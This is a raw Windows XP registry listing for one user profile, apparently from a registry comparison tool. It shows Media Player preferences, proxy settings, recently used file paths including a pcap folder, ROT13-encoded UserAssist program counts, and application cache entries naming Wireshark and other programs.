HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences AcceptedPrivacyStatement dword:00000000 dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences MetadataRetrieval dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences SendUserGUID hex:00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences SilentAcquisition dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UsageTracking dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences DisableMRU dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences LaunchIndex dword:00000002
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences AppColorLimited dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences FirstRun dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences X "10"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences Y "10"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences Width "686"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences Height "536"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences Maximized "0"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences Volume dword:00000032
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences ModeShuffle dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences ModeLoop dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences Mute dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences Balance dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences CurrentEffectType "Battery"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences CurrentEffectPreset dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences VideoZoom dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences ShrinkToFit dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences ShowEffects dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences ShowFullScreenPlaylist dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences NowPlayingQuickHide dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences ShowTitles dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences ShowCaptions dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences NowPlayingPlaylist dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences NowPlayingMetadata dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences NowPlayingSettings dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences VizAutoSelect dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences CurrentDisplayView "VizView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences CurrentSettingsView "EQView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences CurrentMetadataView "MediaInfoView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences CurrentDisplayPreset dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences CurrentSettingsPreset dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences CurrentMetadataPreset dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserDisplayView "VizView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserWMPDisplayView "VizView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserWMPSettingsView "EQView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserWMPMetadataView "MediaInfoView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserDisplayPreset dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserWMPDisplayPreset dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserWMPSettingsPreset dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserWMPMetadataPreset dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserWMPShowSettings dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserWMPShowMetadata dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences ShowAlbumArt dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences RandomFolderName "0009236B"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences LastPlaylist hex:00,00,00,00,43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,5c,00,62,00,6f,00,6d,00,62,00,65,00,72,00,5c,00,41,00,70,00,70,00,6c,00,69,00,63,00,61,00,74,00,69,00,6f,00,6e,00,20,00,44,00,61,00,74,00,61,00,5c,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,5c,00,4d,00,65,00,64,00,69,00,61,00,20,00,50,00,6c,00,61,00,79,00,65,00,72,00,5c,00,30,00,30,00,30,00,39,00,32,00,33,00,36,00,42,00,2e,00,77,00,70,00,6c,00,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences LastPlaylistQuery ""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences LastPlaylistIndex dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\EqualizerSettings
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyStyle dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyName ""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyPort dword:00000050
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyBypass dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyExclude ""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyStyle dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyName ""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyPort dword:000006db
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyBypass dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyExclude ""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyStyle dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyName ""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyPort dword:0000022a
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyBypass dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyExclude ""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\UserOptions
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\UserOptions DesktopShortcut "no"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\UserOptions QuickLaunchShortcut "yes"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Setup\CreatedLinks Shortcut4 "C:\Documents and Settings\bomber\Application Data\Microsoft\Internet Explorer\Quick Launch\Windows Media Player.lnk"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Multimedia\ActiveMovie
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Multimedia\ActiveMovie\Filter Cache
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Multimedia\ActiveMovie\Filter Cache 0 hex:e0,5a,00,00,65,68,63,66,00,00,00,00,00,00,00,00,02,01,00,00,00,00,00,00,01,00,20,00,49,00,00,00,40,00,64,00,65,00,76,00,69,00,63,00,65,00,3a,00,64,00,6d,00,6f,00,3a,00,7b,00,32,00,45,00,45,00,42,00,34,00,41,00,44,00,46,00,2d,00,34,00,35,00,37,00,38,00,2d,00,34,00,44,00,31,00,30,00,2d,00,42,00,43,00,41,00,37,00,2d,00,42,00,42,00,39,00,35,00,35,00,46,00,35,00,36,00,33,00,32,00,30,00,41,00,7d,00,7b,00,35,00,37,00,46,00,32,00,44,00,42,00,38,00,42,00,2d,00,45,00,36,00,42,00,42,00,2d,00,34,00,35,00,31,00,33,00,2d,00,39,00,44,00,34,00,33,00,2d,00,44,00,43,00,44,00,32,00,41,00,36,00,35,00,39,00,33,00,31,00,32,00,35,00,7d,00,00,00,00,00,40,00,64,00,65,00,76,00,69,00,63,00,65,00,3a,00,64,00,6d,00,6f,00,3a,00,7b,00,38,00,37,00,34,00,31,00,33,00,31,00,43,00,42,00,2d,00,34,00,45,00,43,00,43,00,2d,00,34,00,34,00,33,00,42,00,2d,00,38,00,39,00,34,00,38,00,2d,00,37,00,34,00,36,00,42,00,38,00,39,00,35,00,39,00,35,00,44,00,32,00,30,00,7d,00,7b,00,35,00,37,00,46,00,32,00,44,00,42,00,38,00,42,00,2d,00,45,00,36,00,42,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU a hex:77,00,69,00,72,00,65,00,73,00,68,00,61,00,72,00,6b,00,2e,00,65,00,78,00,65,00,00,00,43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,5c,00,62,00,6f,00,6d,00,62,00,65,00,72,00,5c,00,4d,00,79,00,20,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU MRUList "a"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU a "C:\Documents and Settings\bomber\My Documents\pcap"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU MRUList "a"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\* a "C:\Documents and Settings\bomber\My Documents\pcap"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\* MRUList "a"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs Order hex:08,00,00,00,02,00,00,00,7c,09,00,00,01,00,00,00,0f,00,00,00,8a,00,00,00,00,00,00,00,7c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,6a,00,32,00,22,06,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,31,2e,4c,4e,4b,00,00,40,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,9a,00,00,00,01,00,00,00,8c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,7a,00,32,00,d3,02,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,32,2e,4c,4e,4b,00,00,50,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,20,00,43,00,61,00,74,00,61,00,6c,00,6f,00,67,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,d2,00,00,00,02,00,00,00,c4,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,b2,00, hex:08,00,00,00,02,00,00,00,7c,09,00,00,01,00,00,00,0f,00,00,00,8a,00,00,00,00,00,00,00,7c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,6a,00,32,00,22,06,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,31,2e,4c,4e,4b,00,00,40,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,9a,00,00,00,01,00,00,00,8c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,7a,00,32,00,d3,02,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,32,2e,4c,4e,4b,00,00,50,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,20,00,43,00,61,00,74,00,61,00,6c,00,6f,00,67,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,d2,00,00,00,02,00,00,00,c4,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,b2,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage ProgramsCache hex:09,00,00,00,0b,00,56,00,00,00,54,00,31,00,00,00,00,00,36,41,48,7e,11,00,50,72,6f,67,72,61,6d,73,00,00,3c,00,03,00,04,00,ef,be,36,41,40,7e,36,41,48,7e,14,00,26,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,73,00,00,00,40,73,68,65,6c,6c,33,32,2e,64,6c,6c,2c,2d,32,31,37,38,32,00,18,00,00,00,01,d4,00,00,00,d2,00,32,00,23,03,00,00,36,41,48,7e,20,00,49,4e,54,45,52,4e,7e,31,2e,4c,4e,4b,00,00,42,00,03,00,04,00,ef,be,36,41,48,7e,36,41,48,7e,14,00,00,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,74,00,00,00,0b,00,ef,be,00,00,00,00,00,00,00,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,5c,00,49,00,45,00,58,00,50,00,4c,00,4f,00,52,00,45,00,2e,00,45,00,58,00,45,00,00,00,00,00,1c,00,00,00,01,dc,00,00,00,da,00,32,00,e2,02,00,00,36,41,24,83,20,00,4f,55,54,4c,4f,4f, hex:09,00,00,00,0b,00,56,00,00,00,54,00,31,00,00,00,00,00,36,41,48,7e,11,00,50,72,6f,67,72,61,6d,73,00,00,3c,00,03,00,04,00,ef,be,36,41,40,7e,36,41,48,7e,14,00,26,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,73,00,00,00,40,73,68,65,6c,6c,33,32,2e,64,6c,6c,2c,2d,32,31,37,38,32,00,18,00,00,00,01,d4,00,00,00,d2,00,32,00,23,03,00,00,36,41,48,7e,20,00,49,4e,54,45,52,4e,7e,31,2e,4c,4e,4b,00,00,42,00,03,00,04,00,ef,be,36,41,48,7e,36,41,48,7e,14,00,00,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,74,00,00,00,0b,00,ef,be,00,00,00,00,00,00,00,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,5c,00,49,00,45,00,58,00,50,00,4c,00,4f,00,52,00,45,00,2e,00,45,00,58,00,45,00,00,00,00,00,1c,00,00,00,01,dc,00,00,00,da,00,32,00,e2,02,00,00,36,41,24,83,20,00,4f,55,54,4c,4f,4f,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage StartMenu_Balloon_Time hex:b0,27,b0,17,df,98,cd,01, hex:f0,f5,4b,1c,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU hex:01,00,00,00,10,00,00,00,50,e8,07,19,df,98,cd,01, hex:01,00,00,00,14,00,00,00,90,71,d8,1e,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\pzq.rkr hex:01,00,00,00,08,00,00,00,d0,cf,da,d9,de,98,cd,01, hex:01,00,00,00,09,00,00,00,90,2d,68,fb,df,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU:P:\Cebtenz Svyrf\Vagrearg Rkcybere\VRKCYBER.RKR hex:01,00,00,00,08,00,00,00,b0,e4,6a,a6,dd,98,cd,01, hex:01,00,00,00,09,00,00,00,d0,f4,ef,4e,df,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore Count dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,80,02,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore Type dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore Flags dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore Count dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,44,02,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{25336920-03F9-11CF-8FD0-00AA00686F13}\iexplore Count dword:00000004 dword:00000005
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{25336920-03F9-11CF-8FD0-00AA00686F13}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,10,00,35,00,e0,03, hex:dc,07,09,00,06,00,16,00,10,00,1e,00,05,00,51,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore Count dword:00000002 dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,05,00,0b,00,3c,02, hex:dc,07,09,00,06,00,16,00,10,00,1c,00,26,00,a0,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore Count dword:00000002 dword:00000007
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,10,00,2b,00,28,01, hex:dc,07,09,00,06,00,16,00,10,00,1f,00,0f,00,b0,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore LoadTime dword:00000088 dword:0000009d
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore Count dword:00000003 dword:00000004
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,10,00,2a,00,c6,03, hex:dc,07,09,00,06,00,16,00,10,00,1c,00,22,00,04,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore Count dword:00000002 dword:00000007
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,10,00,2b,00,ab,01, hex:dc,07,09,00,06,00,16,00,10,00,1f,00,0f,00,50,02,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache @xpsp1res.dll,-11005 "Sends and receives e-mail and newsgroup messages."
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\Program Files\Wireshark\wireshark.exe "Wireshark"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\Program Files\Common Files\Java\Java Update\jucheck.exe "Java(TM) Update Checker"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\Program Files\Windows Media Player\setup_wm.exe "Microsoft Windows Media Configuration Utility"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\WINDOWS\system32\taskmgr.exe "Windows TaskManager"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\WINDOWS\explorer.exe "Windows Explorer"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache @xpsp3res.dll,-20000 "Network Diagnostics for Windows XP"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache @shell32.dll,-12691 "My Recent Documents"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache @C:\WINDOWS\system32\SHELL32.dll,-9217 "My Network Places"
